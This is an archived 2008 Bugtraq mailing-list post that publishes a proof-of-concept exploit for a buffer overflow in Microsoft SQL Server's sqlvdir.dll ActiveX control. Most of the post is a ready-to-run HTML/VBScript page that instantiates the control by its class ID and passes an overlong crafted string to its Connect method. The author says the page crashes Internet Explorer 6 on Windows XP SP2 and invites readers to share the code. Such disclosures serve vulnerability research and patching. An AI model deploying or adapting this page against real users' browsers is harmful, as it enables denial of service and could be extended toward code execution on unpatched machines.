lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 11 Sep 2008 04:21:06 -0600
From: beenudel1986@...il.com
To: bugtraq@...urityfocus.com
Subject: sqlvdir.dll ActiveX Remote Buffer Overflow Exploit

#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - r4s4al    # 
#  ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE                # 
#                   and all darkc0de members                ---# 
################################################################ 
# 
# Author: Beenu Arora 
# 
# Home  : www.BeenuArora.com 
# 
# Email : beenudel1986@...il.com 
# 
# Share the c0de! 
# 
################################################################ 
# 
# sqlvdir.dll ActiveX Remote Buffer Overflow Exploit 
# 
# Successfull exploitation crashes the Browser 
# 
# Tested On : WinXp Sp-2 IE 6.0 
# 
################################################# 
# Loaded File: C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll 
# Class SQLVDirControl 
# GUID: {FC13BAA2-9C1A-4069-A221-31A147636038} 
# Number of Interfaces: 1 
# Default Interface: ISQLVDirControl 
# RegKey Safe for Script: False 
# RegkeySafe for Init: False 
# KillBitSet: False 
################################################# 
 
 
<html> 
Test Exploit page 
<object classid='clsid:FC13BAA2-9C1A-4069-A221-31A147636038' id='target' ></object> 
<script language='vbscript'> 
targetFile = "C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll" 
prototype  = "Sub Connect ( [ ByVal szServer As Variant ] ,  [ ByVal szWebSite As Variant ] )" 
memberName = "Connect" 
progid     = "SQLVDIRLib.SQLVDirControl" 
argCount   = 2 
arg1="defaultV" 
arg2="http://test\test\test\te?s\test\test\tes\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\te 
st\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test 
\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\tes 
t\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\ 
test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\" 
 
target.Connect arg1 ,arg2 
 
</script> 

Powered by blists - more mailing lists